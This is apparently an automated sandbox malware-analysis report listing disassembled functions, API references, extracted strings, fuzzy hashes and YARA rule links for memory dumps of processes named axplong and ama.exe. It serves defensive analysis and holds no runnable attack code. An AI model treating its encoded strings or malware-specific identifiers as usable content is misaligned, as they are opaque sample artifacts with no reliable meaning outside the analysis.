Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf952c2b50a42e0864b1a913b21eeed88838913e551af70a1b2db136742e41a2
Instruction ID: 3be84278aacf252853ca2d9df22373bfe7c728e19dfa5447d0f1123d7b8f4c94
Opcode Fuzzy Hash: cf952c2b50a42e0864b1a913b21eeed88838913e551af70a1b2db136742e41a2
Instruction Fuzzy Hash: E351B3716087918FD319CF2D841523ABFE1BF85200F084A9EF1EA87292D775DA04CBA2

Function 00D3775B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 459863465a432201c74d6674bc686709b00d991b89317a5985166c4176c8b65e
Instruction ID: a1cce2768e6f617149fcca1580f5fec1d7f4197fd4f90047f43e16c7e62bfb31
Opcode Fuzzy Hash: 459863465a432201c74d6674bc686709b00d991b89317a5985166c4176c8b65e
Instruction Fuzzy Hash: 7C21D673F2093947770CC47E8C532BDB6E1C78C501745423AE8A6EA2C1D968D917E2E4

Function 00D3763B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da7adb5c1f73d21df0352cd8063cdaee3973e4a21e6a2c3c38c4157428e1a316
Instruction ID: ec05c21687ed6c2a52809564bf82b2ca2ebdbe9c3990ea6200553ed357b53e17
Opcode Fuzzy Hash: da7adb5c1f73d21df0352cd8063cdaee3973e4a21e6a2c3c38c4157428e1a316
Instruction Fuzzy Hash: 3C118A63F30C255B675C817D8C172BAA5D2DBD825071F533ED826E7384E994DE13D2A0

Function 00D38700 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 088cbd1a292820636de0768e1fb34354eca207a656ed97d062a63e3a49ede070
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1C112BFB20038283D6148A3DC8F86B6A797EBC5321F3D437AF1424B754DA22D945B620

Function 00D2643B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c74e0d16c8aff6be69c3666daa6731534b26ecfa4acc82b576e8badfd7d151
Instruction ID: 82b4db51a7a304fff611a43842ef20673fbee4e52699b6e0de547eb5d0e90e4f
Opcode Fuzzy Hash: 51c74e0d16c8aff6be69c3666daa6731534b26ecfa4acc82b576e8badfd7d151
Instruction Fuzzy Hash: D5E08C30245658AFCE267B14F818E9C3B2AEF72399F144800F88846222CB25EC82C9A0

Function 00D2A1A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 99b74bd782b3e27ba33a6ad90880a0fb96e42d67a9835d07595f42f51ae61310
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 15E08C32911338EBCB16DB8CD90498AF3ECEB48B24F160496B501D3250C270DE00CBF1

Function 00D02DF0 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

Gl==, xrefs: 00D0366E
Xst=, xrefs: 00D0338A
Inhk, xrefs: 00D0375F
246122658369, xrefs: 00D033A4
9wGTaHilQw==, xrefs: 00D02E97
stoi argument out of range, xrefs: 00D02DF0, 00D04239
invalid stoi argument, xrefs: 00D0422A

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$9wGTaHilQw==$Gl==$Inhk$Xst=$invalid stoi argument$stoi argument out of range
API String ID: 0-301961687
Opcode ID: 7543fe6ef2e63cf24a9d5ba806dd2a4f9a84c4446d1a04c2d661c5430137aa1c
Instruction ID: 9a953d556ca741fed58ce3e6e7c6b423f92bda890ce8032fdec079371136dcc3
Opcode Fuzzy Hash: 7543fe6ef2e63cf24a9d5ba806dd2a4f9a84c4446d1a04c2d661c5430137aa1c
Instruction Fuzzy Hash: CA02B071A00248DFEF15DFA8C849BDEBBB5EF05304F544558E809AB2C2D7759A48CBB1

Function 00D24750 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D24787
___except_validate_context_record.LIBVCRUNTIME ref: 00D2478F
_ValidateLocalCookies.LIBCMT ref: 00D24818
__IsNonwritableInCurrentImage.LIBCMT ref: 00D24843
_ValidateLocalCookies.LIBCMT ref: 00D24898

Strings

csm, xrefs: 00D2482D

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d881c8249d2f3e41424a27b0a5388fbde4d4e4038ad3f554e5d625bf303d9bc9
Instruction ID: 9aa7ac166ce4e42b42aec7aba30b486c31e6c9f245d35f6f77850279d1123453
Opcode Fuzzy Hash: d881c8249d2f3e41424a27b0a5388fbde4d4e4038ad3f554e5d625bf303d9bc9
Instruction Fuzzy Hash: 3A51B734A102689BCF10DF68E885AAEBBB5EF55318F188055ED199B352D731DA05CBF0

Function 00D270A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00D270EB

Strings

.cmd, xrefs: 00D27109
.com, xrefs: 00D2712B
.bat, xrefs: 00D2711A
.exe, xrefs: 00D270F8

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: b2c9665181284b1a0f3b2b33fe8cd47833b4a69fd91403934820ccb5d0c5e97c
Instruction ID: 215011f314c5c159ff7754665ceec282b424a4580923690ed82bd22373db261a
Opcode Fuzzy Hash: b2c9665181284b1a0f3b2b33fe8cd47833b4a69fd91403934820ccb5d0c5e97c
Instruction Fuzzy Hash: 2A01C837708B352566256019BC026375798CFB7BBCB1D002AF944F72C2EF95DC5241B0

Function 00CF2DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00CF2E5F
__Mtx_unlock.LIBCPMT ref: 00CF2ECC
__Cnd_broadcast.LIBCPMT ref: 00CF2EE3
__Mtx_unlock.LIBCPMT ref: 00CF2FF5
__Mtx_unlock.LIBCPMT ref: 00CF309B

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 49392ba4c1edb9ffe807cc9266b2ae606d5813d800d021fb757e4429d3287f50
Instruction ID: 4fcdad3431db9f56c8d1ffa5ead06707c89d68057f585f8355709d0719c43fb6
Opcode Fuzzy Hash: 49392ba4c1edb9ffe807cc9266b2ae606d5813d800d021fb757e4429d3287f50
Instruction Fuzzy Hash: C5A1F770A113599FDB51DFA4C844B6AB7F8FF05310F14426AE925D7281EB30EA04CBE2

Function 00D2C990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D2CA17

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: ae4f286c34a6b1ebf8854d1534e54eca376ce448ac3dda6ae416134a9ffd0e49
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: B6B15B329242A59FDB15CF28D8827BEBBF5EF65348F1891A9E845EB341D6348D01CB70

Function 00D0BA72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00D0BACA
__Xtime_diff_to_millis2.LIBCPMT ref: 00D0BAE4
_xtime_get.LIBCPMT ref: 00D0BB07
__Xtime_diff_to_millis2.LIBCPMT ref: 00D0BB13

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 8e8de7af4e911df32ce970e21b0f687329c66892c9359fd86fad7f14eff17418
Instruction ID: 01dc63504f55297835cf4ed742812175ab32db3eb135f4e79a7c810ed35ba797
Opcode Fuzzy Hash: 8e8de7af4e911df32ce970e21b0f687329c66892c9359fd86fad7f14eff17418
Instruction Fuzzy Hash: B6212C75A10219AFDF00EFA4DC86ABEB7B8EF49710F50005AF905A72D1DB70AD019BB0

Analysis Process: ama.exePID: 6200, Parent PID: 6024COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	58
Total number of Limit Nodes:	11

Executed Functions

Function 07777C80 Relevance: 5.5, Strings: 4, Instructions: 496
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 077784E6
$]q, xrefs: 07778419
$]q, xrefs: 07777FA5
$]q, xrefs: 07778069

Memory Dump Source

Source File: 00000004.00000002.2406687762.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7770000_ama.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 6c6c1be4acb24929da6273eda9295af7860a553ed81e2629ddf410c26fe4933f
Instruction ID: f9825d684ac2ab2e8a9eff88fb10aeb444dd7624c3e32030951690eb6ba3d81b
Opcode Fuzzy Hash: 6c6c1be4acb24929da6273eda9295af7860a553ed81e2629ddf410c26fe4933f
Instruction Fuzzy Hash: 3D32C2B0E00229CFDB69DF64C994BDEB7B2BF49300F5085A9D409AB251DB349E85CF91

Function 069171E0 Relevance: 5.3, Strings: 4, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06917391
$]q, xrefs: 0691737B
$]q, xrefs: 06917441
$]q, xrefs: 0691742B

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 283c7d1ef730eb4ec6c28020016c65092a2fca6042cd8ba458bb7ecbd42cc053
Instruction ID: 21a690f229e970899ddca35e949b3af07b187e5c08384d0838ba23222d35e11e
Opcode Fuzzy Hash: 283c7d1ef730eb4ec6c28020016c65092a2fca6042cd8ba458bb7ecbd42cc053
Instruction Fuzzy Hash: D8C1C470E0121DCFDB58DFA5C980B9EBBB2BF89300F608569D409AB255DB349E86CF51

Function 06916630 Relevance: 2.8, Strings: 2, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1, xrefs: 0691699F
., xrefs: 06916924

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID: .$1
API String ID: 0-1839485796
Opcode ID: 9b06c1ed036a81cb4b1e536b483c65f6a0ee7f8acdbdf8a0d327859f2d563c88
Instruction ID: ec4e79ed5a8edcc001aec7d690df488d5cef257b80808de81add741b17a3c10b
Opcode Fuzzy Hash: 9b06c1ed036a81cb4b1e536b483c65f6a0ee7f8acdbdf8a0d327859f2d563c88
Instruction Fuzzy Hash: 63D1D274E01218CFDB64DFA4C940B9DBBB2BF89300F6085A9C509AB354DB359E86CF50

Function 07778841 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 07778B29
LR]q, xrefs: 077788F2

Memory Dump Source

Source File: 00000004.00000002.2406687762.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7770000_ama.jbxd

Similarity

API ID:
String ID: LR]q$PH]q
API String ID: 0-3791814328
Opcode ID: a0c059c38a171359a763e0975228948089166327798ae47abb82c9ec5b9daf56
